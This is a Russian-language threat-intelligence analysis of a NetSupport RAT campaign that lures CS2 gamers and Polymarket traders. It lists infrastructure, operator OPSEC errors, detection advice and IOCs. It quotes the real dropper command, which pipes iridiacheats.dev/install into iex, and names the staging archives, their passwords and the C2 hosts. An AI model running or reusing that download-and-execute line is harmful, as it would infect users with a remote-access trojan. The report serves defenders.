81-байтовый PowerShell-дроппер iridia.ps1 ведет к NetSupport RAT: оператор использует двойную приманку для геймеров и криптотрейдеров

Содержимое iridia.ps1 представляет собой однострочную команду: "powershell -command "$install='CS2 MOD'; iwr iridiacheats.dev/install -useb| iex"". Переменная "$install" служит маркером кампании, а флаг "-useb" (сокращение от "-UseBasicParsing") отключает использование устаревшего парсера Internet Explorer при загрузке. После выполнения скрипта Powershell обращается к домену iridiacheats.dev, откуда загружает и запускает следующий этап - обфусцированный загрузчик, который через косвенное обращение к переменной конструирует строку "iex" и выполняет код с адреса "iridiacheats.dev/fal.php". Этот PHP-скрипт (объёмом 675 байт) создаёт в папке "%LOCALAPPDATA%\NetService\", скачивает архивы "gggs.7z" и "lin.7z" с паролями "falos" и "ilil" соответственно, а также легитимные утилиты 7z.exe и 7z.dll. После распаковки запускается "Service.exe" через "explorer.exe" - приём подмены родительского процесса (PPID spoofing) для обхода поведенческих детекторов. В папку автозагрузки помещается ярлык "service.lnk", обеспечивающий закрепление в системе.

NetSupport Manager RAT версии 12.01 с загрузчиком версии 10.60 устанавливается в тихом режиме: файл конфигурации "client32.ini" отключает отображение значка в системном трее, запрещает отключение клиента со стороны пользователя и скрывает окно при подключении. Каналы управления (C2) указывают на домены "kssaprraemdda.com:443" (основной) и "psosenslsddaev.com:443" (резервный). Примечательно, что распределительный сервер на "iridiacheats.dev" проверяет пользовательский агент: обычные браузеры получают блокирующую страницу Cloudflare с кодом 403, а при обращении из PowerShell отдаётся вредоносный загрузчик.

Вторая ветвь кампании использует домен "polymarketscanner.dev" и приманку якобы инструмента для отслеживания "китов" (крупных инвесторов) на рынке предсказаний Polymarket. Вместо архивов "gggs.7z" здесь применяется архив "at.7z", но пароли те же ("falos" / "ilil"), а сам RAT-бинарник идентичен. Интересной особенностью является PowerShell-имитация работающего сканера: около 400 строк кода выводят фальшивые прогресс-бары, поддельные цепочки транзакций между сетями Polygon, Base и Arbitrum, сфабрикованные кластеры кошельков с реалистичными позициями и ложное оповещение о притоке 12,84 миллиона долларов. Всё это нужно, чтобы жертва не заподозрила неладное, пока троян завершает установку в фоне.

Инфраструктура кампании компактна. Домены "iridiacheats.dev" и "polymarketscanner.dev" зарегистрированы через гонконгского регистратора NiceNIC с разницей в несколько дней (2 и 6 апреля 2026 года). Они обслуживаются Cloudflare, но их конечной целью служит единый C2-узел по адресу 193.143.1[.]21. Этот сервер, работающий под управлением Windows, арендован у провайдера Proton66 OOO (AS198953). Proton66 неоднократно упоминался в сообществе Threat Intelligence как поставщик bulletproof-хостинга: в этом году на его мощностях уже разворачивалась инфраструктура для нескольких несвязанных кампаний. На сервере открыты порты 443 (шлюз NetSupport) и 3389 (RDP), причём RDP-сертификат выдан 5 февраля и раскрывает имя хоста "WIN-425ORDLIMJB". Образец iridia.ps1 был впервые замечен на площадке MalwareBazaar 8 апреля 2026 года, о чём сообщил аналитик под псевдонимом burger403.

Оператор кампании допустил несколько серьёзных ошибок operational security (безопасности операционной деятельности), которые позволяют с высокой степенью уверенности связать обе приманки с одним лицом. Во-первых, используется пиратская лицензия NetSupport с серийным номером "NSM1234" - однозначный идентификатор. Во-вторых, метаданные ярлыка "service.lnk" содержат полный путь к файлу "C:\Users\Administrator\AppData\Local\NetService\service.exe" и имя сборочной машины "ultimate-intel0". Там же засвечен SID встроенной учётной записи администратора: "S-1-5-21-3340606691-2803584206-3274291654-500". Настройки клиента "client32.ini" указывают на файл, отредактированный в папке "C:\Users\Administrator\Desktop\client32u.ini". Наконец, все четыре C2-домена зарегистрированы через одного регистратора NiceNIC всплесками с интервалом в минуты, что упрощает выявление и блокировку.

Двойная приманка нацелена на две аудитории: геймеров, ищущих читы для CS2, и трейдеров криптовалютных рынков предсказаний. Монетизация, скорее всего, включает продажу доступа к заражённым системам, кражу криптовалютных кошельков и сбор учётных данных. Специалистам по информационной безопасности рекомендуется заблокировать IP-адрес 193.143.1.21 и все шесть доменов (iridiacheats.dev, polymarketscanner.dev, kssaprraemdda.com, psosenslsddaev.com, jakkakaskakasj.com, jasjdpoekkqwda.com). На конечных точках необходимо отслеживать появление папки "%LOCALAPPDATA%\NetService\", нестандартные запуски "Service.exe" и подгрузку библиотеки "PCICL32.DLL". PowerShell-операции с командами "iwr -useb | iex", направленные на домены .dev, также являются сильным сигналом, особенно если родительским процессом выступает "explorer.exe". Ярлыки в папке автозагрузки, указывающие в каталог NetService, должны немедленно проверяться.

Судя по датам регистрации, инфраструктура на Polymarket была подготовлена ещё 22 января 2026 года - почти за три месяца до добавления CS2-приманки. Это говорит о предварительном планировании и, возможно, о тестировании первой ветви кампании. Объединение двух разных сообществ (геймеры и криптотрейдеры) под одним зонтом снижает вероятность быстрого обнаружения: каждый сегмент привлекает внимание независимых исследовательских групп, и атака может дольше оставаться незамеченной. Однако грубые OPSEC-промахи оператора делают его идентификацию и последующее пресечение деятельности лишь вопросом времени.

IPv4

• 193.143.1.21

Domains

• iridiacheats.dev
• jakkakaskakasj.com
• jasjdpoekkqwda.com
• kssaprraemdda.com
• polymarketscanner.dev
• psosenslsddaev.com

SHA256

• 0c36c1062ada3b12c771e94a125233f76c8d1a73108fb68b225605313a533197
• 275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792
• 2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5
• 3084c055d2d79212308051a05f1859053cf0e313792d0b2658fa47b4e027bcb6
• 47f53b727d4e09c44c5595c747956ac5b4801341e1bb9195f31cec33548abf66
• 52506d242a55051fd78ca4aa28b347fa14cdcc495f83a4e8a3aec36e1c73b4ea
• afe6bc8f12b08c0d52a20a4ef96c00c2187711348d5a4419ed96edff16fd4d15
• b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80
• d38bf86953ccbdf85f3f371cc196abc43d415d5ea19751181551a0e530662083